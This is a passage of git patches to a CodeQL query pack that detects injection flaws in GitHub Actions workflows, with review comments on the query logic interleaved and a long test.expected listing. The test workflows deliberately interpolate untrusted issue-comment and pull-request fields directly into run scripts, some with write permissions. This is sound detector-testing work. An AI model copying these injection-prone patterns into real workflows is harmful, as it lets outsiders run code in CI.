5.0 * @id actions/artifact-poisoning * @tags actions * security diff --git a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml index be1559d47110..3128aacc93ce 100644 --- a/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml 
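Review bot: `getPermission` and `getAPermission` only read entries of the `permissions:` mapping (`n.lookup(perm).(YamlScalar).getValue()`, with `n` declared a YamlMapping in this class), so the scalar shorthands `permissions: write-all` and `permissions: read-all` yield no permission at all, and the new `getAPermission() = "write"` test in Workflow.isPrivileged() silently misses the most permissive form. Whether a scalar `permissions:` value even produces a PermissionsImpl depends on how TPermissionsNode is built, which is outside this hunk, so the shorthand has to be handled either there or directly in isPrivileged(). At minimum a QLDoc line should state the limitation so callers do not assume coverage, e.g. `/** Gets the access level (`read`/`write`/`none`) for scope `perm`. Only the mapping form is modelled; the `write-all`/`read-all` shorthand yields no result. */` above `getPermission`.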
+++ b/ql/test/query-tests/Security/CWE-094/.github/workflows/simple3.yml @@ -8,7 +8,7 @@ on: permissions: actions: read checks: read - contents: read + contents: write jobs: echo_trigger: From 29cef4fd7358cf329d111cd616cff2611b59097c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 16:24:51 +0200 Subject: [PATCH 169/707] Bump qlpack versions --- ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml index aa02154bab14..f5b3952ce96b 100644 --- a/ql/lib/qlpack.yml +++ b/ql/lib/qlpack.yml @@ -2,7 +2,7 @@ library: true warnOnImplicitThis: true name: githubsecuritylab/actions-all -version: 0.0.9 +version: 0.0.10 dependencies: codeql/controlflow: "*" codeql/dataflow: "*" diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml index 134b0db2b171..7c1cc78df4a3 100644 --- a/ql/src/qlpack.yml +++ b/ql/src/qlpack.yml @@ -1,7 +1,7 @@ --- library: false name: githubsecuritylab/actions-queries -version: 0.0.9 +version: 0.0.10 groups: - actions - queries From 2925380e72bdc2174b33db84e5a5c12d6cc7982e Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Thu, 11 Apr 2024 16:27:40 +0200 Subject: [PATCH 170/707] Remove dummy models --- ql/lib/ext/TEST-RW-MODELS.model.yml | 17 ----------------- 1 file changed, 17 deletions(-) delete mode 100644 ql/lib/ext/TEST-RW-MODELS.model.yml diff --git a/ql/lib/ext/TEST-RW-MODELS.model.yml b/ql/lib/ext/TEST-RW-MODELS.model.yml deleted file mode 100644 index 65952bccb35a..000000000000 --- a/ql/lib/ext/TEST-RW-MODELS.model.yml +++ /dev/null 
@@ -1,17 +0,0 @@ -extensions: - - addsTo: - pack: githubsecuritylab/actions-all - extensible: summaryModel - data: - - ["octo-org/this-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - - ["octo-org/summary-repo/.github/workflows/workflow.yml", "*", "input.config-path", "output.workflow-output", "taint", "manual"] - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sourceModel - data: - - ["octo-org/source-repo/.github/workflows/workflow.yml", "*", "output.workflow-output", "Foo", "manual"] - - addsTo: - pack: githubsecuritylab/actions-all - extensible: sinkModel - data: - - ["octo-org/sink-repo/.github/workflows/workflow.yml", "*", "input.config-path", "code-injection", "manual"] From db86c40c5066cfb211926b4715741af6841c885c Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 12 Apr 2024 13:07:40 +0200 Subject: [PATCH 171/707] Enable dataflow through GITHUB_ENV vars --- ql/lib/codeql/actions/Ast.qll | 4 +- ql/lib/codeql/actions/ast/internal/Ast.qll | 3 + .../codeql/actions/dataflow/FlowSources.qll | 2 +- ql/lib/codeql/actions/dataflow/FlowSteps.qll | 88 +-- .../dataflow/internal/DataFlowPrivate.qll | 14 +- .../security/ArtifactPoisoningQuery.qll | 16 +- .../actions/security/EnvVarInjectionQuery.qll | 2 +- .../.github/workflows/multiline.yml | 40 +- ql/test/library-tests/test.expected | 523 +++++++++++++++++- .../CWE-077/.github/workflows/test4.yml | 17 +- .../Security/CWE-077/EnvVarInjection.expected | 6 + .../PrivilegedEnvVarInjection.expected | 8 + .../Security/CWE-094/CodeInjection.expected | 4 +- .../CWE-094/PrivilegedCodeInjection.expected | 4 +- 14 files changed, 655 insertions(+), 76 deletions(-) diff --git a/ql/lib/codeql/actions/Ast.qll b/ql/lib/codeql/actions/Ast.qll index 91ee95a90ab4..edee4d03eb4c 100644 --- a/ql/lib/codeql/actions/Ast.qll +++ b/ql/lib/codeql/actions/Ast.qll 
@@ -25,7 +25,7 @@ module Utils { } bindingset[line, var] - private predicate extractLineAssignment(string line, string var, string key, string value) { + predicate extractLineAssignment(string line, string var, string key, string value) { exists(string assignment | // single line assignment assignment = @@ -59,7 +59,7 @@ module Utils { } bindingset[script, var] - private predicate extractMultilineAssignment(string script, string var, string key, string value) { + predicate extractMultilineAssignment(string script, string var, string key, string value) { // multiline assignment exists(string flattenedScript | flattenedScript = script.replaceAll("\n", "::NEW_LINE::") and diff --git a/ql/lib/codeql/actions/ast/internal/Ast.qll b/ql/lib/codeql/actions/ast/internal/Ast.qll index 300377536d67..a66befe7d7d2 100644 --- a/ql/lib/codeql/actions/ast/internal/Ast.qll +++ b/ql/lib/codeql/actions/ast/internal/Ast.qll @@ -1010,6 +1010,9 @@ class EnvExpressionImpl extends SimpleReferenceExpressionImpl { s.getInScopeEnvVarExpr(fieldName) = result and s.getAChildNode*() = this ) + or + // Some Run steps may store taint in the enclosing job so we need to check the enclosing job + result = this.getEnclosingJob() } } diff --git a/ql/lib/codeql/actions/dataflow/FlowSources.qll b/ql/lib/codeql/actions/dataflow/FlowSources.qll index 01aa8bbc3200..c937aaa550b9 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSources.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSources.qll @@ -170,7 +170,7 @@ private class CompositeActionInputSource extends RemoteFlowSource { * A downloadeded artifact. */ private class ArtifactToOptionSource extends RemoteFlowSource { - ArtifactToOptionSource() { this.asExpr() instanceof ArtifactDownloadStep } + ArtifactToOptionSource() { this.asExpr() instanceof UntrustedArtifactDownloadStep } override string getSourceType() { result = "Step output from Artifact" } } 
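Review bot: The new `or result = this.getEnclosingJob()` alternative in `EnvExpressionImpl` resolves every `env.X` reference to its job regardless of which step it sits in, but a value written to `GITHUB_ENV` is only visible to steps that run after the writing Run step, so an `env.X` in an earlier step of the same job would appear to read a value that does not exist yet, which looks like a source of false positives once the job-level store from `envToEnvStoreStep` is consumed. If the AST exposes step ordering, I would constrain the alternative to jobs where a preceding Run step actually writes that key, along the lines of `exists(Run r | r.getEnclosingJob() = result and Utils::writeToGitHubEnv(r, fieldName, _) | /* r precedes this step */ ...)`, and otherwise at least document the over-approximation in the comment, e.g. `// Over-approximation: any env.X in the job may read a GITHUB_ENV write from any Run step, ignoring step order`. The enclosing predicate starts outside this hunk, so I cannot tell whether its result is also used for content-less flow steps, in which case the job node would become a read target for unrelated taint as well. Separately, `extractLineAssignment` and `extractMultilineAssignment` are now part of the public surface of `Utils` but still carry no QLDoc; a short doc describing the `line`/`var`/`key`/`value` contract (and that both are `bindingset` predicates that must be called with `line`/`script` and `var` bound) would help callers.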
diff --git a/ql/lib/codeql/actions/dataflow/FlowSteps.qll b/ql/lib/codeql/actions/dataflow/FlowSteps.qll index 3988f2190ab2..4e0496150450 100644 --- a/ql/lib/codeql/actions/dataflow/FlowSteps.qll +++ b/ql/lib/codeql/actions/dataflow/FlowSteps.qll 
@@ -23,46 +23,57 @@ class AdditionalTaintStep extends Unit { } /** - * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. + * Holds if a Run step declares an environment variable, uses it in its script to set another env var. * e.g. - * - name: Extract and Clean Initial URL - * id: extract-url * env: * BODY: ${{ github.event.comment.body }} * run: | - * echo "::set-output name=foo::$BODY" - * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT - * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" + * echo "foo=$(echo $BODY)" >> $GITHUB_ENV */ -predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { - exists(Run run, string varName, string key, string value | - c = any(DataFlow::FieldContent ct | ct.getName() = key.replaceAll("output\\.", "")) and +predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string varName, string value | run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubOutput(run, key, value) and - value.matches("%$" + ["", "{", "ENV{"] + varName + "%") and + Utils::writeToGitHubEnv(run, _, value) and + value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and succ.asExpr() = run ) } +class EnvToRunTaintStep extends AdditionalTaintStep { + override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } +} + /** - * Holds if a Run step declares an environment variable, uses it in its script to set another env var. + * Holds if a Run step declares an environment variable, uses it in its script and sets an output in its script. * e.g. 
+ * - name: Extract and Clean Initial URL + * id: extract-url * env: * BODY: ${{ github.event.comment.body }} * run: | - * echo "foo=$(echo $BODY)" >> $GITHUB_ENV + * echo "::set-output name=foo::$BODY" + * echo "foo=$(echo $BODY)" >> $GITHUB_OUTPUT + * echo "foo=$(echo $BODY)" >> "$GITHUB_OUTPUT" */ -predicate envToRunStep(DataFlow::Node pred, DataFlow::Node succ) { - exists(Run run, string varName, string value | - run.getInScopeEnvVarExpr(varName) = pred.asExpr() and - Utils::writeToGitHubEnv(run, _, value) and - value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0 and - succ.asExpr() = run +predicate envToOutputStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + succ.asExpr() = run and + Utils::writeToGitHubOutput(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") ) } -class EnvToRunTaintStep extends AdditionalTaintStep { - override predicate step(DataFlow::Node node1, DataFlow::Node node2) { envToRunStep(node1, node2) } +predicate envToEnvStoreStep(DataFlow::Node pred, DataFlow::Node succ, DataFlow::ContentSet c) { + exists(Run run, string varName, string key, string value | + c = any(DataFlow::FieldContent ct | ct.getName() = key) and + pred.asExpr() = run.getInScopeEnvVarExpr(varName) and + // we store the taint on the enclosing job since the may not exist an implicit env attribute + succ.asExpr() = run.getEnclosingJob() and + Utils::writeToGitHubEnv(run, key, value) and + value.matches("%$" + ["", "{", "ENV{"] + varName + "%") + ) } /** 
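Review bot: In `envToRunStep` the condition `value.indexOf("$" + ["", "{", "ENV{"] + varName) > 0` misses the most common form of the pattern, because `indexOf` yields 0 when the value starts with the variable reference (e.g. `echo "foo=$BODY" >> $GITHUB_ENV` gives a value of `$BODY`), so that step is silently dropped while the sibling `envToOutputStoreStep` and `envToEnvStoreStep` accept it via `matches`. I would make the three predicates consistent and use `value.matches("%$" + ["", "{", "ENV{"] + varName + "%")` here as well; note that all three also match on a name prefix (`$BODY` inside `$BODYGUARD`), which is probably acceptable for a taint step but worth a comment. The new `envToEnvStoreStep` has no QLDoc and its inline comment is garbled; I would replace it with `// Store the taint on the enclosing job, since the job may not declare an explicit env attribute to attach it to` and add a doc comment mirroring the one on `envToOutputStoreStep` with a `>> $GITHUB_ENV` example. The hunk ends on the opening `/**` of the next doc comment, which continues outside this view.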
@@ -71,29 +82,40 @@ class EnvToRunTaintStep extends AdditionalTaintStep { * - run: echo "::set-output name=id::$(> $GITHUB_OUTPUT - echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT - echo "CHANGELOGEOF" >> $GITHUB_OUTPUT - run: | - EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) - echo "status<<$EOF" >> $GITHUB_OUTPUT - echo "$(cat status.output.json)" >> $GITHUB_OUTPUT - echo "$EOF" >> $GITHUB_OUTPUT - run: | - echo "response<<$EOF" >> $GITHUB_OUTPUT - echo $output >> $GITHUB_OUTPUT - echo "$EOF" >> $GITHUB_OUTPUT - run: | - { - echo 'JSON_RESPONSE<> "$GITHUB_ENV" + echo "changelog<> $GITHUB_OUTPUT + echo -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT + echo "CHANGELOGEOF" >> $GITHUB_OUTPUT + - run: | + EOF=$(dd if=/dev/urandom bs=15 count=1 status=none | base64) + echo "status<<$EOF" >> $GITHUB_OUTPUT + echo "$(cat status.output.json)" >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + echo "response<<$EOF" >> $GITHUB_OUTPUT + echo $output >> $GITHUB_OUTPUT + echo "$EOF" >> $GITHUB_OUTPUT + - run: | + { + echo 'JSON_RESPONSE<> "$GITHUB_ENV" + - run: | + cat <<-"EOF" > event.json + ${{ toJson(github.event) }} + EOF diff --git a/ql/test/library-tests/test.expected b/ql/test/library-tests/test.expected index a6be2226b8c3..c08d4c824e1a 100644 --- a/ql/test/library-tests/test.expected +++ b/ql/test/library-tests/test.expected 
@@ -1,2 +1,521 @@ -ERROR: Could not resolve predicate extractLineAssignment/4 (test.ql:85,5-33) -ERROR: Could not resolve predicate extractLineAssignment/4 (test.ql:103,5-33) +files +| .github/workflows/expression_nodes.yml:0:0:0:0 | .github/workflows/expression_nodes.yml | +| .github/workflows/multiline.yml:0:0:0:0 | .github/workflows/multiline.yml | +| .github/workflows/test.yml:0:0:0:0 | .github/workflows/test.yml | +workflows +| .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/multiline.yml:1:1:33:14 | on: | +| .github/workflows/test.yml:1:1:40:53 | on: push | +reusableWorkflows +compositeActions +jobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +localJobs +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/multiline.yml:9:5:33:14 | Job: Test | +| .github/workflows/test.yml:5:5:31:2 | Job: job1 | +| .github/workflows/test.yml:32:5:40:53 | Job: job2 | +extJobs +steps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| 
.github/workflows/test.yml:19:9:26:6 | Uses Step: step | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | +runSteps +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| 
.github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | echo ${{needs.job1.outputs.job_output}} | +runExprs +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:18:24:18:51 | github.event.issue.body | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:19:24:19:55 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.comment.body | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | github.event.issue.body | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | 
.github/workflows/multiline.yml:32:13:32:39 | toJson(github.event) | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:20:27:64 | steps.source.outputs.all_changed_files | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:15:29:55 | github.event.pull_request.head.ref | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:20:40:53 | needs.job1.outputs.job_output | +uses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +stepUses +| .github/workflows/test.yml:11:9:15:6 | Uses Step | +| .github/workflows/test.yml:15:9:19:6 | Uses Step: source | +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | +usesArgs +| .github/workflows/test.yml:19:9:26:6 | Uses Step: step | source | .github/workflows/test.yml:23:20:23:64 | steps.source.outputs.all_changed_files | +runStepChildren +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo 
'${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:20:9:21:47 | Run Step | .github/workflows/expression_nodes.yml:20:14:21:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}' | +| .github/workflows/multiline.yml:11:9:15:6 | Run Step | .github/workflows/multiline.yml:11:14:14:48 | echo "changelog<> $GITHUB_OUTPUT\necho -e "$FILTERED_CHANGELOG" >> $GITHUB_OUTPUT\necho "CHANGELOGEOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:15:9:20:6 | Run Step | .github/workflows/multiline.yml:15:14:19:40 | EOF=$(dd if=/dev/urandom bs=15 count=1 status=none \| base64)\necho "status<<$EOF" >> $GITHUB_OUTPUT\necho "$(cat status.output.json)" >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:20:9:24:6 | Run Step | .github/workflows/multiline.yml:20:14:23:40 | echo "response<<$EOF" >> $GITHUB_OUTPUT\necho $output >> $GITHUB_OUTPUT\necho "$EOF" >> $GITHUB_OUTPUT\n | +| .github/workflows/multiline.yml:24:9:30:6 | Run Step | .github/workflows/multiline.yml:24:14:29:29 | {\n echo 'JSON_RESPONSE<> "$GITHUB_ENV"\n | +| .github/workflows/multiline.yml:30:9:33:14 | Run Step | .github/workflows/multiline.yml:30:14:33:14 | cat <<-"EOF" > event.json\n ${{ toJson(github.event) }}\nEOF\n | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:26:13:26:23 | simplesink1 | +| .github/workflows/test.yml:26:9:28:6 | Run Step: simplesink1 | .github/workflows/test.yml:27:14:27:63 | echo ${{ steps.source.outputs.all_changed_files }} | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:28:13:28:23 | simplesink2 | +| .github/workflows/test.yml:28:9:31:2 | Run Step: simplesink2 | .github/workflows/test.yml:29:14:29:54 | ${{ github.event.pull_request.head.ref }} | +| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:39:13:39:16 | sink | 
+| .github/workflows/test.yml:39:9:40:53 | Run Step: sink | .github/workflows/test.yml:40:14:40:52 | echo ${{needs.job1.outputs.job_output}} | +parentNodes +| .github/workflows/expression_nodes.yml:1:5:1:17 | issue_comment | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:5:14:5:26 | ubuntu-latest | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | .github/workflows/expression_nodes.yml:7:9:8:6 | Run Step | +| .github/workflows/expression_nodes.yml:7:27:7:58 | github.event.comment.body | .github/workflows/expression_nodes.yml:7:14:7:58 | LINE 1echo '${{ github.event.comment.body }}' | +| .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | 
.github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:8:9:10:6 | Run Step | +| .github/workflows/expression_nodes.yml:9:25:9:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:8:14:9:57 | LINE 1 echo '${{ github.event.comment.body }}'\n | +| .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:10:9:13:6 | Run Step | +| .github/workflows/expression_nodes.yml:11:25:11:56 | github.event.comment.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:12:24:12:51 | github.event.issue.body | .github/workflows/expression_nodes.yml:10:14:12:53 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | 
.github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | .github/workflows/expression_nodes.yml:13:9:16:6 | Run Step | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.comment.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:14:9:15:46 | github.event.issue.body | .github/workflows/expression_nodes.yml:13:14:15:46 | LINE 1 echo '${{ github.event.comment.body }}' echo '${{github.event.issue.body}}'\n | +| .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:1:1:21:47 | on: issue_comment | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:5:5:21:47 | Job: echo-chamber | +| .github/workflows/expression_nodes.yml:16:14:19:57 | LINE 1 echo '${{ github.event.comment.body }}'\nLINE 2 echo '${{github.event.issue.body}}'\nLINE 3 echo '${{ github.event.comment.body }}'\n | .github/workflows/expression_nodes.yml:16:9:20:6 | Run Step | +| .github/workflows/expression_nodes.yml:17:25:17:56 | github.event.comment.body | 
